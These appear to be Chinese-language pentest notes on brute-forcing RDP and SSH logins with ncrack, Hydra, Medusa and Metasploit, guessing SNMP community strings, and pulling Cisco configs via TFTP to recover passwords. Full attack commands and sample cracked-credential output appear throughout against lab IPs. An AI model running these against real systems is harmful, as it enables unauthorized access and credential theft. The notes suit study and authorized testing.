需要有一个强大的字典,如果太大了的话,计算机索引不过来,也是没用的.
口令的破解全靠运气,运气好几秒钟,几分钟都有可能,运气不好一天二天解不开也正常.总要去尝试
暴力破解,会影响机器的CPU,可能会导致拒绝服务的情况.而且还会有拒绝密码登陆这种情况.
工具:https://github.com/tearsecurity/leviathan
Leviathan是一个大规模审计工具包,具有广泛的服务发现,强力,SQL注入检测和运行自定义漏洞利用功能。它包含开源工具,如masscan,ncrack,dsss,并为您提供组合使用它们的灵活性。
_________________________________________________________
官方都给出了演示和相关文档!!!
ncrack : https://nmap.org/ncrack/man.html
ncrack暴破RDP帐户
ncrack -u Administrator -P /root/shellWork/UserAndPassword/password.pwd -p 3389 192.168.2.110
Discovered credentials for ms-wbt-server on 192.168.2.110 3389/tcp:
192.168.2.110 3389/tcp ms-wbt-server: 'Administrator' '000000'
rdesktop 192.168.2.110ncrack -p 22 --user username -P /root/shellWork/UserAndPassword/password.txt IPHydra : https://github.com/vanhauser-thc/thc-hydra
hydra -l root -P /root/shellWork/UserAndPassword/password.txt 192.168.2.111 sshmedusa : htt
ps://github.com/jmk-foofus/medusa
medusa -u msfadmin -P /root/shellWork/UserAndPassword/password.txt -h 192.168.2.111 -M sshMetasploit:
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/shellWork/UserAndPassword/user.usr
USER_FILE => /root/shellWork/UserAndPassword/username.txt
msf auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/shellWork/UserAndPassword/password.txt
PASS_FILE => /root/shellWork/UserAndPassword/password.txt
msf auxiliary(scanner/ssh/ssh_login) > set THREADS 4
THREADS => 4
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.2.111
RHOSTS => 192.168.2.111
msf auxiliary(scanner/ssh/ssh_login) > exploit
_____________________________________________________________________________________________________
对Cisco设备猜测团体字符串:
onesixtyone : https://github.com/trailofbits/onesixtyone
SNMP协议是一种无状态的,面向数据报的协议。SNMP扫描程序是一种程序,它将SNMP请求发送到多个IP地址,尝试不同的社区字符串并等待回复。
SNMP 协议: https://blog.csdn.net/shanzhizi/article/details/11606767
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt IP #onesixtyone能够找到公共和私人社区字符串
#把找到的团体字符串 写入一个文件
echo -e "public\nsecret\n" > test.txt使用Metasploit 解密:
msf > search snmp_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/snmp/snmp_login normal SNMP Community Login Scanner
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) > show options
msf auxiliary(scanner/snmp/snmp_login) > set PASS_FILE text.txt
PASS_FILE => text.txt
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS IP
RHOSTS => IP
msf auxiliary(scanner/snmp/snmp_login) > exploit
msf auxiliary(scanner/snmp/snmp_login) > creds #查看 团体字是只读还是能读写SNMP和TFTP是处理Cisco设备时最常用的两个协议.SNMP可以获取和设置设置设备的信息.TFTP是Cisco设备将配置文件,新映像和其他信息加载到交换机或路由设备的方式之一,Cisco设备可以作为TFTP服务器,允许其他操作系统从该设备上加载配置信息和配置文件等.
可以用SNMP来获得Cisco设备的配置信息和运行配置,可以通过TFCP将新配置推送回服务器.
msf > use auxiliary/scanner/snmp/cisco_config_tftp
msf auxiliary(scanner/snmp/cisco_config_tftp) > show options
Module options (auxiliary/scanner/snmp/cisco_config_tftp):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
LHOST no The IP address of the system running this module
OUTPUTDIR no The directory where we should save the configuration files (disabled by default)
RETRIES 1 yes SNMP Retries
RHOSTS yes The target address range or CIDR identifier
RPORT 161 yes The target port (UDP)
SOURCE 4 yes Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
THREADS 1 yes The number of concurrent threads
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
msf auxiliary(scanner/snmp/cisco_config_tftp) >
这个模块可以向设备发送SNMP写命令,也可以下载配置文件,成功后msf会启动一TFTP服务,让设备连接到msf启动的服务.
msf会解析文件,得到密码.